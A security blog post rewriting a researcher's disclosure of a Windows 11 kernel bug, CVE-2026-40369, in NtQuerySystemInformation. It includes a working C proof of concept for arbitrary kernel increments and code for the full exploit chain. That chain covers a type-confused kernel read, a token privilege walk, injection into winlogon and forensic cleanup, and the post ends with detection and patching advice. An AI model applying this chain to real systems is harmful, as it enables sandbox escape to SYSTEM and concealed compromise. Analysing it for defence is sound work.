Windows Kernel EoP vulnerability CVE-2026-40369

CVE-2026-40369: Arbitrary Kernel Address Increment via NtQuerySystemInformation

Source & attribution. This post is an original English rewrite of “Arbitrary Kernel Address Increment via NtQuerySystemInformation (CVE-2026-40369)” by Ori Nimron (@orinimron123), published at pwn2nimron.com. The full exploit source lives at github.com/orinimron123/CVE-2026-40369-EXPLOIT. A shorter news-style coverage was also published by Daily CyberSecurity (securityonline.info). All IDA decompilations, the PoC source, the crash dump, the affected-versions table and the exploit-chain structure are credited to Ori Nimron; this post paraphrases the surrounding prose and adds editorial framing for engineers reading on core-jmp.org. Please read the canonical writeup and inspect the GitHub repository for ground truth.

Executive Summary

CVE-2026-40369 is a Windows kernel vulnerability in nt!ExpGetProcessInformation — the helper that backs the NtQuerySystemInformation syscall — that lets any unprivileged caller, including one trapped inside the Chrome renderer sandbox, perform three monotonically-increasing 32-bit writes at a kernel address of its choosing per syscall. The bug is reachable by passing information class 253 (SystemProcessInformationExtension) with Length=0: the kernel’s ProbeForWrite call is a no-op when the length argument is zero, so the user-mode pointer is never validated, and the per-process write loop runs against that pointer anyway.

Ori Nimron’s public writeup composes this single primitive into a clean SYSTEM exploit. He bumps the OOB-index gate CmpLayerVersionCount from 4 to 0xB, slides a NULL CmpLayerVersions entry into a controlled user-mode VirtualAlloc page, type-confuses it through an SEH-protected query path, and uses the Windows UTF-8 conversion path inside RtlUnicodeStringToAnsiString to convert the bug into an arbitrary kernel read. From there it is a short walk: EPROCESS traversal to locate the attacker’s own token, three DWORD increments at token+0x42 to light up bit 20 (SeDebugPrivilege) inside Token.Privileges.Enabled, VirtualAllocEx + CreateRemoteThread into winlogon.exe, and a SYSTEM shell. The author then cleans the count back to 4 via byte-wise LSB overflow, so the OS is left in a sane state with no obvious forensic trail. The whole chain is described as 100% deterministic, with no race condition, no heap spray, and no special tokens required.

Windows Kernel EoP vulnerability CVE-2026-40369
Hero illustration accompanying the broader coverage of the bug. Source: securityonline.info.

At a Glance

FieldValue
CVECVE-2026-40369 (CRITICAL, per the researcher’s advisory)
ResearcherOri Nimron (@orinimron123)
OSWindows 11, builds 26200.8039, 26200.8117, 26200.8246, 26200.8328 (24H2 — 25H2)
Componentntoskrnl.exeExpGetProcessInformation (info class 253, SystemProcessInformationExtension)
PrimitiveThree monotonically-increasing 32-bit increments at an attacker-controlled kernel address per syscall
Attack VectorLocal, any user, any integrity level, any sandbox
Privileges RequiredNone (callable from Untrusted Integrity)
Reliability100% deterministic; no race, no heap-spray
DisclosureFull public disclosure after Pwn2Own Berlin 2026 capacity rejection
Public PoCgithub.com/orinimron123/CVE-2026-40369-EXPLOIT
Summary of CVE-2026-40369 affected products and exploit reliability. Source: original article.

Preface: How the Bug Was Found

The author frames the discovery as a counter-intuitive scrutiny argument. He was preparing a Chrome-renderer-sandbox-escape entry for Pwn2Own Berlin 2026: the renderer runs at Untrusted Integrity with a restricted token, Win32k lockdown removes the entire GDI/USER attack surface, and what remains reachable is a narrow band of NT syscalls — file ops (broker-filtered), registry (largely read-only), and system-information queries. NtQuerySystemInformation is widely considered the most-audited syscall on the platform: hundreds of information classes, decades of patches, well-trodden territory. The author argues the inverse heuristic: code “everyone thinks has been thoroughly audited sometimes receives less scrutiny precisely because of that assumption.” He started disqualifying information classes inside IDA to clear them out and, within a day, landed on class 253 — structurally a sibling of the well-known class 5, sharing the same code path but missing one validation step.

The exploit was built end-to-end and registered for the Pwn2Own Berlin 2026 Web Browser category. ZDI rejected the submission citing capacity (over one hundred entries, no extra contest days). The author chose full public disclosure in lieu of the contest payout. No MSRC coordination timeline, CVSS vector, or patch identifier is published alongside the writeup; the only affected-builds list is the one reproduced in the table above.

The Bug

Entry Point: NtQuerySystemInformation at 0x140ae08a0

The syscall handler is a thin dispatcher: a small switch peels off the classes that need bespoke handling (8, 0x17, 0x2A) and explicitly blocks two more (0x6B and 0x79). Everything else falls through into the generic worker ExpQuerySystemInformation. Class 253 lands in that default branch.

void __fastcall NtQuerySystemInformation(
    unsigned int a1, _QWORD *a2, ULONG a3, ULONG *a4)
{
  switch ( a1 ) {
    // ... special cases for classes 8, 0x17, 0x2A, etc ...
    case 0x6Bu: case 0x79u: /* ... blocked classes ... */
      return;
    default:
      v9 = 0;
      ExpQuerySystemInformation(a1, NULL, 0, a2, a3, a4); // <- class 253 lands here
      return;
  }
}

The Vulnerable Function: ExpGetProcessInformation at 0x140ada6d0

Inside ExpGetProcessInformation, three sibling classes share most of the code: class 252 (compact info), class 253 (extension info), and class 5 (process info). The class-252 and class-5 paths store the user buffer into separate variables (pCompactInfo / pProcessInfo) and immediately clear the unused pExtensionOut to NULL at 0x140ada8bd. The class-253 path stores the user buffer into pExtensionOut at 0x140ada874 with no validation, then goto LABEL_11 — bypassing the clearing line below.

ExpGetProcessInformation(unsigned int *userBuffer, unsigned int length, ...)
{
  if ( infoClass == 252 ) {     // @ 0x140ada807
    pCompactInfo = userBuffer;  // class 252 uses pCompactInfo - safe path
    pProcessInfo = 0;
  }
  else {
    pCompactInfo = 0;           // @ 0x140ada83d
    if ( infoClass == 253 ) {   // @ 0x140ada84b
      entrySize = 12;           // entry size = 12 bytes (3 x DWORD)
      pExtensionOut = userBuffer; // @ 0x140ada874 - BUG! No validation!
      pProcessInfo = 0;
      goto LABEL_11;             // skip the pExtensionOut = 0 below
    }
    pProcessInfo = userBuffer;   // class 5 uses pProcessInfo - safe path
  }
  pExtensionOut = 0;            // @ 0x140ada8bd - class 5/252 clear it (safe)

LABEL_11:
  // Size check: does NOT return early on failure!
  if ( length < entrySize )      // @ 0x140ada8da - Length < 12?
    status = 0xC0000004;         // STATUS_INFO_LENGTH_MISMATCH (stored, not returned!)
  ...

The Write Primitive

The per-process iteration loop at 0x140adaa76 runs ExGetNextProcess until it reaches the tail of the process list. Inside the loop, when infoClass == 253, three writes happen against the pointer the user supplied:

  // Process iteration - executes for EVERY process on the system
  while ( NextProcess ) {                              // @ 0x140adaa76
    if ( infoClass == 253 ) {                           // @ 0x140adaaf6
      ++*pExtensionOut;                                 // @ 0x140adaafe: *(DWORD*)(addr+0) += 1
      pExtensionOut[1] += PsGetProcessActiveThreadCount(NextProcess); // addr+4
      pExtensionOut[2] += ObGetProcessHandleCount(NextProcess, 0);   // addr+8
    }
    // ... class 5/252 paths with proper bounds checking ...
    NextProcess = ExGetNextProcess(NextProcess, restricted); // @ 0x140adb9e4
  }

That is the entire vulnerability in three lines: ++*pExtensionOut, pExtensionOut[1] += thread_count, pExtensionOut[2] += handle_count. The fixed entry size 12 in r14 (visible in the crash dump below) is the structural fingerprint of class 253; everything downstream of the dispatch is generic per-process aggregation.

Why the Writes Happen Despite Length=0

The length check at 0x140ada8d3 / 0x140ada8da looks superficially correct: it compares length against the per-class entrySize (12 for class 253). But the early-return is gated on the returnLength output pointer being NULL. In a realistic caller (the PoC passes &needed), returnLength is non-null, so the routine stores 0xC0000004 (STATUS_INFO_LENGTH_MISMATCH) into a local status variable and continues. All three increment writes execute before the error status is finally returned. The ProbeForWrite call earlier in the path is itself a no-op when Length=0, because its body is wrapped in if (Length). Net effect: an attacker-supplied kernel pointer reaches the write loop with zero validation.

  lengthTooSmall = length < entrySize;       // @ 0x140ada8d3 - Length (0) < 12? YES
  if ( length < entrySize ) {                // @ 0x140ada8da
    if ( !returnLength )                     // only returns if ReturnLength ptr is NULL
      return 0xC0000004;                    // STATUS_INFO_LENGTH_MISMATCH
  }
  status = lengthTooSmall ? 0xC0000004 : 0; // stores error in status... but continues!
  // Execution falls through into the process iteration loop
  // The writes at pExtensionOut happen BEFORE this status is ever returned

Proof of Concept

The minimal PoC is short. It points the syscall at an arbitrary kernel address 0xffff800041424344 and lets the kernel increment three DWORDs there once per process. If the target is mapped writable kernel memory, three increments happen; if it is unmapped, the kernel faults on the first inc dword ptr [rbx] and blue-screens.

#include <windows.h>
#include <stdio.h>

#pragma comment(lib, "ntdll.lib")

typedef long NTSTATUS;
#define SystemProcessInformationExtension 253

typedef NTSTATUS (NTAPI *PNtQuerySystemInformation)(
    ULONG, PVOID, ULONG, PULONG);

int main(void)
{
    PNtQuerySystemInformation pNtQSI = (PNtQuerySystemInformation)
        GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtQuerySystemInformation");

    PVOID target = (PVOID)0xffff800041424344ULL;  // any kernel address

    ULONG needed = 0;
    NTSTATUS status = pNtQSI(
        253,       // SystemProcessInformationExtension
        target,    // kernel address - ProbeForWrite skipped because Length=0
        0,         // Length=0 bypasses ProbeForWrite entirely
        &needed
    );
    // If target is mapped writable kernel memory:
    //   *(DWORD*)(target+0) += number_of_processes
    //   *(DWORD*)(target+4) += total_thread_count
    //   *(DWORD*)(target+8) += total_handle_count
    // If target is unmapped -> BSOD (kernel fault on write)

    printf("[*] status: 0x%08lX | needed: %lun", status, needed);
    return 0;
}

The crash dump from a kernel debugger when the supplied address is not mapped confirms the primitive: the fault is inc dword ptr [rbx] at nt!ExpGetProcessInformation+0x42e, with rbx equal to the user-supplied address, r14 = 0xC (the class-253 entry size of 12), and r15 holding the EPROCESS of the in-flight iteration:

PROCESS_NAME: poc.exe

nt!ExpGetProcessInformation+0x42e:
fffff801`d7adb22e ff03   inc dword ptr [rbx]   ; rbx = 0xffff800041424344

Registers:
  rbx = 0xffff800041424344 (attacker-supplied kernel address, pExtensionOut)
  r14 = 0xC (= 12 = per-entry size, confirms class 253 path)
  r15 = fffff801d7fcef00 (EPROCESS of current iteration)

Stack:
  nt!ExpGetProcessInformation+0x42e
  nt!ExpQuerySystemInformation+0xd7f
  nt!NtQuerySystemInformation+0x91
  nt!KiSystemServiceCopyEnd+0x25
  ntdll!NtQuerySystemInformation+0x14

Sandbox Escape Implications

The set of mitigations the Chrome renderer (and Edge / Firefox content processes) sandboxes rely on does not stop this syscall:

  • Win32k lockdown — doesn’t apply; this is an NT syscall, not Win32k.
  • Restricted tokens — no privilege check is performed for this information class.
  • Untrusted Integrity — no integrity check is performed on the call path.
  • Sandbox brokers — do not mediate NtQuerySystemInformation.

The operational impact, as the author states explicitly: any compromised renderer process — reached via a V8 or SpiderMonkey RCE, for instance — can chain directly into SYSTEM. The sandbox boundary contributes zero defence-in-depth against this primitive.

Full Exploit Chain

The composed chain in the public repository moves from KASLR leak through corrupted layer-version count, into a type-confused arbitrary kernel read, into a token-privilege bitmask increment, and finally into a code-injection step against a SYSTEM process. The cleanup step at the end restores CmpLayerVersionCount to its original value of 4. Each stage is briefly outlined below; the GitHub repository has the running code.

Step 1: KASLR Bypass via prefetch-tool

The first dependency is knowing where in kernel memory to write. The author uses the public prefetch-tool — a pure user-mode timing side-channel utility — to leak the ntoskrnl.exe base address. No kernel interaction is required for this stage.

Step 2: Arbitrary Kernel Read via CmpLayerVersions Type Confusion

The write primitive on its own is one-way: increment-only. To turn it into a read, the author exploits a second piece of kernel state — the CmpLayerVersions array used by configuration-manager build-version queries (info class 222). The array is fixed-size 16 entries, but only indices [0..3] are populated at runtime; indices [4..15] are perpetual NULL pointers. The gate that stops a caller from indexing beyond 3 is CmpLayerVersionCount itself.

Phase 1 — Unlock the OOB index. Bump CmpLayerVersionCount from 0x04 to 0x0B by aiming the write primitive at ntos + RVA_CmpLayerVersionCount - 11. The class-253 first write (addr+0) lands on the count itself; the design choice of subtracting 11 ensures only the count’s low byte is mutated, so the increment is fine-grained. After ~7 calls the count reads 0x0B and index 9 is reachable.

Phase 2 — Slide a NULL pointer into user space. With index 9 reachable, point the write primitive at the storage of CmpLayerVersions[9]. The pointer is currently NULL; each syscall adds the current process count (~80–100) to the low DWORD. After enough calls the pointer drifts up into the range 0x10000–0x1FFFF, i.e. into a 64KB allocation the exploit can place there with VirtualAlloc(0x10000, 0x10000). The exact landing offset inside that allocation fluctuates, so it has to be detected.

Phase 3 — Detect the landing. Pre-fill the 64KB allocation with a sequential DWORD pattern (p[i] = i), then issue an info-class-222 query with index 9. The kernel dereferences the corrupted pointer, treats whatever is there as a FAKE_VERSION_STRUCT, and copies Field_04 from it to the output buffer. Search the user allocation for that DWORD — the unique pattern reveals the exact byte offset the pointer landed at.

// 1. Fill 64KB with unique pattern: p[i] = i
FillAllocationWithUniqueDwordPattern(p, 0x10000);

// 2. Query class 222, index 9 - kernel reads Field_04 from our fake struct
//    The returned Field_04 will be whatever DWORD was at landing+4
query_build_info(QUERY_INDEX, &info);

// 3. The value in info.Field_04 IS the pattern DWORD at the landing offset
//    Search our allocation to find it:
confusion = detect_address(p, 0x10000, info.Field_04);
//    Now we know the EXACT byte offset where the pointer landed
//    and can write our FAKE_VERSION_STRUCT at that address

Why this never BSODs. The address ranges the corrupted pointer can touch divide cleanly into faulting and non-faulting zones, and the configuration-manager query path wraps the dereference in a Windows SEH frame:

RangeMappingOutcome
0x00000000 — 0x0000FFFFUnmapped user spaceFault → caught by __try/__except → returns error
0x00010000 — 0x0001FFFFThe exploit’s 64KB VirtualAllocDereference succeeds → kernel reads the fake struct
0x00020000+Unmapped user spaceFault → caught → returns error
0xFFFF8000… upwardKernel address spaceWould BSOD — but the pointer starts at 0 and never reaches here
The four zones the corrupted CmpLayerVersions[9] pointer can drift through. Source: original article.
  __try {
    ProbeForWrite(userBuffer, Length, 4);  // validates OUTPUT buffer
    ...
    CmQueryBuildVersionInformation(&idx, ...);
    //   ^^ inside here: pVersionStruct = CmpLayerVersions[idx]
    //   If v7 points to unmapped usermode addr -> ACCESS_VIOLATION
    //   The kernel CANNOT distinguish between:
    //     - "legitimate ptr to a page that got swapped out"
    //     - "corrupted ptr that was never valid"
    //   It's a usermode address, so it's treated as a normal fault.
  }
  __except(EXCEPTION_EXECUTE_HANDLER) {
    return GetExceptionCode();  // STATUS_ACCESS_VIOLATION -> returned to caller
    // No crash. No BSOD. Just an error code.
  }

This is also where the writeup makes its most pointed cross-OS observation: Windows does not enforce SMAP. The kernel routinely dereferences user-mode pointers; it relies on SEH to recover from invalid ones, not on hardware mode separation. On platforms with SMAP enforcement (modern Linux, macOS) this user-mode-pointer-confusion technique is structurally impossible. Microsoft is reported as working on SMAP enforcement for Windows.

Phase 4 — Craft the fake version struct. At the detected offset write a FAKE_VERSION_STRUCT whose layout aligns with what CmQueryBuildVersionInformation expects: 16 DWORDs of header at +0x00, then a UNICODE_STRING us1 at +0x10 with Length=2, MaxLength=2, and Buffer = TARGET_KERNEL_ADDR. Three more zeroed UNICODE_STRINGs follow (us5/us6/us2…us4), and a sentinel field at +0x320 is set to zero.

When class 222 is queried with index 9, the kernel chases the corrupted pointer into the fake struct, reads us1, calls CmpQueryDowncastString(output+10, 128, &us1), follows us1.Buffer (which the exploit set to TARGET_KERNEL_ADDR), reads 2 bytes from that kernel address, runs them through RtlUnicodeStringToAnsiString, and copies the result into the output buffer the caller controls.

Why the PEB Must Be Set to UTF-8

The conversion path inside RtlUnicodeStringToAnsiString at 0x1408a9800 has a code-page-dependent fork at 0x1408a9842. If the process is detected as UTF-8 (RtlpIsUtf8Process() returns true), the function calls RtlUnicodeToUTF8N — a lossless encoder for the entire Basic Multilingual Plane. If the process is ANSI, the function falls back to a WideCharTable[] lookup that is many-to-one and collapses most input wchar_t values to 0x3F ('?') — a destructive operation that obliterates the read primitive.

  if ( RtlpIsUtf8Process(0) )       // @ 0x1408a9842 - checks process code page
  {
    RtlUnicodeToUTF8N(dst, max,       // UTF-8 path: LOSSLESS encoding
        &actualLen, src, srcLen);      // every wchar round-trips perfectly
  }
  else
  {
    // ANSI path: uses WideCharTable[] lookup
    while ( count < max ) {
      dst[count] = WideCharTable[src[count]]; // LOSSY! many wchars -> 0x3F ('?')
      ++count;
    }
  }

RtlpIsUtf8Process at 0x1408aa170 checks three locations for the UTF-8 codepage magic 0xFDE9: the silo-global ACP at SiloGlobals+0x408, the silo-global OEMCP at SiloGlobals+0x448, and the per-process PEB’s ActiveCodePage field at PEB+0x34C. The third one is what the exploit can set from user space:

  // Check 1: silo-global ACP
  if ( *(WORD*)(SiloGlobals + 0x408) == 0xFDE9 )  return true;
  // Check 2: silo-global OEMCP
  if ( *(WORD*)(SiloGlobals + 0x448) == 0xFDE9 )  return true;
  // Check 3: per-process PEB ActiveCodePage
  if ( *(WORD*)(PEB + 0x34C) == 0xFDE9 )         return true;  // <- this is what we set
  return false;
void SetProcessUtf8(void)
{
    PPEB peb = NtCurrentTeb()->ProcessEnvironmentBlock;
    *(USHORT*)((BYTE*)peb + 0x34C) = 0xFDE9;  // ActiveCodePage = UTF-8
}
PathStepsOutcome
ANSI Code Page (default, Windows-1252)Read 0x48 0x8B → wchar U+8B48WideCharTable lookup → 0x3F (?)Lossy — most wchars collapse to ?
UTF-8 Code Page (0xFDE9)Read 0x48 0x8B → wchar U+8B48RtlUnicodeToUTF8N0xE8 0xAD 0x88Lossless — every wchar U+0000–U+FFFF round-trips in 1–3 bytes; surrogates emit U+FFFD
ANSI vs UTF-8 conversion path inside RtlUnicodeStringToAnsiString. Source: original article.

One residual issue: the UTF-16 to UTF-8 conversion replaces the surrogate range 0xD800–0xDFFF with U+FFFD. If the two bytes being read happen to encode a surrogate, the data is lost. The mitigation is to read pairs of overlapping [i-1, i] and [i+1, i+2] — pair each unknown byte with a known neighbour so the combined high byte is almost never in surrogate range. The fallback — three consecutive surrogate-range high bytes — has a probability around 1/32^3 ≈ 0.003%, low enough to never matter on real kernel data.

The read target function is CmQueryBuildVersionInformation at 0x140a44a80; the corrupted pointer load is at 0x140a44ae4. The four downcast calls feed off pVersionStruct+4, +16, +20, +24 with destination offsets output+10, +74, +138, +202 and a maximum length of 128:

__int64 __fastcall CmQueryBuildVersionInformation(int *a1, int a2, _WORD *a3, ...)
{
  layerIdx = *inputBuffer;                  // attacker-controlled index
  if ( layerIdx >= CmpLayerVersionCount )  // bounds check (we incremented this!)
    return STATUS_INVALID_PARAMETER;

  pVersionStruct = CmpLayerVersions[layerIdx]; // @ 0x140a44ae4 - corrupted pointer!
                                                // Points into our usermode allocation
  *(DWORD*)(output + 1) = *pVersionStruct;     // copies DWORDs from fake struct
  *(DWORD*)(output + 2) = pVersionStruct[1];
  *(DWORD*)(output + 3) = pVersionStruct[2];
  *(DWORD*)(output + 4) = pVersionStruct[3];

  // These calls follow our crafted UNICODE_STRING.Buffer pointers:
  CmpQueryDowncastString(output+10,  128, pVersionStruct+4);  // reads from our target kernel addr!
  CmpQueryDowncastString(output+74,  128, pVersionStruct+16);
  CmpQueryDowncastString(output+138, 128, pVersionStruct+20);
  CmpQueryDowncastString(output+202, 128, pVersionStruct+24);
  ...
}
NTSTATUS __fastcall CmpQueryDowncastString(char *outputBuf, USHORT maxLen, UNICODE_STRING *srcString)
{
  if ( srcString->Buffer && srcString->Length ) { // our fake UNICODE_STRING
    dest.Buffer = outputBuf;                       // output buffer (usermode-visible)
    dest.MaximumLength = maxLen;
    RtlUnicodeStringToAnsiString(                  // converts UTF-16 -> ANSI/UTF-8
        &dest, srcString, 0);                      // reads from srcString->Buffer (kernel addr!)
  }
}

Step 3: Token Privilege Escalation

With an arbitrary kernel-read primitive and the original arbitrary-increment primitive, the path to SYSTEM is mechanical. Walk the ActiveProcessLinks chain starting from PsInitialSystemProcess; for each EPROCESS, read the UniqueProcessId at +0x1D0; when the PID matches the current process, read the Token field at +0x248 and AND with ~0xF to strip the EX_FAST_REF refcount bits. The kernel address of the attacker’s own access token is now known.

// Read PsInitialSystemProcess -> System EPROCESS address
kernel_read(ntos + RVA_PsInitialSystemProcess, 8, &system_eprocess);

// Follow ActiveProcessLinks.Flink chain
current = system_eprocess + 0x1D8;  // head of list
while (current != head) {
    eprocess = current - 0x1D8;       // CONTAINING_RECORD
    kernel_read(eprocess + 0x1D0, 8, &pid);
    if (pid == GetCurrentProcessId()) {
        // Found our EPROCESS!
        kernel_read(eprocess + 0x248, 8, &token_ref);
        token = token_ref & ~0xF;   // strip EX_FAST_REF refcount bits
        break;
    }
    kernel_read(current, 8, &current); // follow Flink
}

Inside the _TOKEN structure, the Privileges sub-struct sits at +0x40: Present at +0x40, Enabled at +0x48, EnabledByDefault at +0x50. SeDebugPrivilege corresponds to bit 20 of Privileges.Enabled, which is bit 4 of byte 2 (token+0x4A). Aiming the class-253 primitive at token+0x42 lands the three DWORD writes at token+0x42, +0x46, +0x4A — each pulls the per-process and per-thread counters into the byte that holds bit 20. After enough iterations bit 20 is set and the process gains SeDebugPrivilege; the readiness check is just OpenProcess(PROCESS_ALL_ACCESS, winlogon_pid).

Step 4: Code Injection into a SYSTEM Process

With SeDebugPrivilege enabled, the rest is a textbook Windows post-exploitation sequence: OpenProcess against winlogon.exe, VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory to drop a 272-byte Metasploit-style cmd.exe-spawning stub, and CreateRemoteThread to run it. The author notes that kernel-mode shellcode execution is also possible by corrupting function pointers or dispatch tables — but Pwn2Own only requires sandbox escape to SYSTEM, so the simpler token-injection path was chosen.

Cleanup: Restoring CmpLayerVersionCount

After the chain runs, CmpLayerVersionCount is somewhere around 0x0B rather than its baseline 0x04 — an obvious anomaly in any post-incident analysis, and a real stability risk because legitimate class-222 callers can now index entries [4..10] that contain whatever garbage Phase 2 left behind. The exploit fixes this with the same primitive that broke it. Since only the LSB matters, it keeps incrementing the low byte (with carry-in from the third DWORD write) until the byte overflows past 0xFF and wraps cleanly back to 0x04. The other three bytes were never written, so they remain 0x00; the final DWORD reads 0x00000004 — bit-identical to the pre-exploit state.

// After exploitation: CmpLayerVersionCount LSB is corrupted (e.g. 0x0B)
// Keep incrementing - LSB carries up by ~1-3 per call
// Eventually wraps: ... -> 0xFE -> 0xFF -> 0x00 -> 0x01 -> ... -> 0x04
while (get_version_count() != 4)
{
    write_at(ntos_base + RVA_CmpLayerVersionCount - 11);
}
// CmpLayerVersionCount == 0x00000004 - fully restored
// System stable, no evidence of corruption
ApproachRange to wrapCallsTimeRisk
Direct DWORD increment (target = Count)0x00000004 → 0xFFFFFFFF → 0x00000004~43,000,000hoursnon-deterministic; may skip 4
LSB only (target = Count − 11)0x0B → 0xFF → 0x04~80–200< 1 secondfine-grained (1–3 per call); lands on 4 reliably
Why the cleanup targets Count − 11 instead of Count directly. Source: original article.

A Note on Patch Status

The two public sources disagree on patch status. The third-party news coverage at securityonline.info reports that Microsoft addressed the bug in the May 2026 Patch Tuesday. The canonical researcher writeup at pwn2nimron.com lists four builds (26200.8039, 26200.8117, 26200.8246, 26200.8328) as confirmed-vulnerable and includes no MSRC ticket, CVSS vector, or “fixed-in” build identifier. The most charitable reconciliation is that Microsoft did ship a fix but it has not been independently corroborated against the public build numbers in the researcher’s tested matrix. For defenders, the actionable response is the same in either case: verify on your own builds. Pull NtQuerySystemInformation with SystemInformationClass = 253 and SystemInformationLength = 0 against a known-controlled kernel page in a lab on each build you care about, and confirm whether the write reaches the page (vulnerable) or returns STATUS_ACCESS_VIOLATION early (patched). Do not rely solely on news-source patch claims for a bug of this severity.

Key Takeaways

  • The defective check is structural: ProbeForWrite(buf, Length, alignment) is wrapped in if (Length), so passing Length=0 turns the entire probe into a no-op. Any syscall handler that “naturally” performs writes even for zero-length buffers is a class of bug to hunt for, not a one-off.
  • An “increment-only” primitive is sufficient for full LPE in modern Windows. Aimed at CmpLayerVersionCount it unlocks an OOB array index; aimed at CmpLayerVersions[9] it slides a NULL pointer into a user-controlled mapping; aimed at token+0x42 it lights up SeDebugPrivilege. The same three writes do all of the work.
  • The kernel’s willingness to dereference user-mode pointers (no SMAP enforcement on Windows) is the structural enabler for the read primitive. On SMAP-enforced operating systems this technique would not work.
  • The Windows UTF-8 fork inside RtlUnicodeStringToAnsiString is a powerful round-trip path that converts a raw kernel-byte read into a recoverable user-mode string. Setting PEB+0x34C = 0xFDE9 from user space is enough to flip the kernel onto the lossless path.
  • Cobalt-Strike-style cleanup via byte-wise carry overflow demonstrates that even one-way primitives can restore state precisely when the attacker is willing to think about which bytes the carry can and cannot reach.
  • The bug is reachable from any integrity level, including Untrusted Integrity inside the Chrome renderer sandbox. Any non-RCE-blocking content vulnerability in Chrome / Edge / Firefox is, on an unpatched host, effectively a SYSTEM-grant.
  • Audited code is not a synonym for safe code. The class-5 sibling of class 253 is safe; class 253 reuses 95% of the same path and is not. “Most-audited syscall” is exactly where this bug lived for years.

Defensive Recommendations

  • Verify patch state on your specific builds. If you are on Windows 11 24H2 or 25H2, run a controlled test (vulnerable address known) against each build number you have in the fleet before declaring it patched.
  • Hunt for the exact syscall fingerprint. If your EDR exposes syscall telemetry, alert on NtQuerySystemInformation with SystemInformationClass == 253 AND SystemInformationLength == 0. The combination is otherwise extremely rare. Add a sibling rule for class 222 with index > 3.
  • Hunt for the PEB UTF-8 flip. A user-mode write of 0xFDE9 to PEB+0x34C by a non-localization-aware process is itself a high-fidelity signal — it is what the exploit uses to switch the kernel onto the lossless conversion path.
  • Hunt for prefetch-side-channel timing patterns. Step 1 of the chain relies on the public prefetch-tool; correlating an unusual prefetch-cache probe with a subsequent NtQuerySystemInformation class-253 call from the same process is a high-fidelity chain detection.
  • Treat browser renderer compromise as kernel-level compromise on unpatched hosts. Until the patch is verified deployed, plan IR against any in-the-wild renderer RCE on Chrome / Edge / Firefox as a SYSTEM compromise, not a sandboxed nuisance.
  • Block the public PoC by hash in WDAC / AppLocker. Pre-compute SHA-256s of common builds of the public repository’s artefacts and deny-list them on endpoints during the rollout window.
  • Code-review sibling info classes in ExpQuerySystemInformation. The defective code path (goto LABEL_11 skipping the buffer clear, length check stored not returned) is structural; other classes may share the shape. The hand-decompilation in the canonical writeup is enough to bootstrap an audit.
  • Track the Windows SMAP roadmap. Once SMAP enforcement ships in Windows, the read half of this chain (and a large family of similar techniques) becomes structurally impossible. Engage your Windows account team on the timeline.

Conclusion

CVE-2026-40369 is, in three lines of vulnerable code, one of the cleanest illustrations in recent memory of how a small validation oversight (ProbeForWrite ducking when Length=0) becomes a full SYSTEM exploit when an attacker is willing to do the structural work to chain it. The Pwn2Own backstory and the explicit framing as a Chrome-renderer-sandbox-escape make the threat-model unusually concrete: assume the attacker is already inside the renderer, give them no privileges, no integrity, no Win32k, no GDI — the chain still ends in SYSTEM and the OS is left looking pristine. The lesson for code reviewers is that “the most-audited syscall” is not the same as “the safest syscall”; the lesson for defenders is that telemetry on rare-but-cheap-to-detect call shapes (class 253 with Length=0; PEB 0xFDE9 writes) is more reliable than waiting for a patch signal that may not arrive. Credit and thanks to Ori Nimron for the writeup, the IDA work, and the structured public PoC; the canonical reference is and remains pwn2nimron.com/blog together with the CVE-2026-40369-EXPLOIT repository.

References

Credit and thanks to Ori Nimron — the IDA decompilations, the PoC, the crash dump, the exploit chain and the structural insight in this post are all his. The canonical writeup at pwn2nimron.com remains the authoritative reference.

Comments are closed.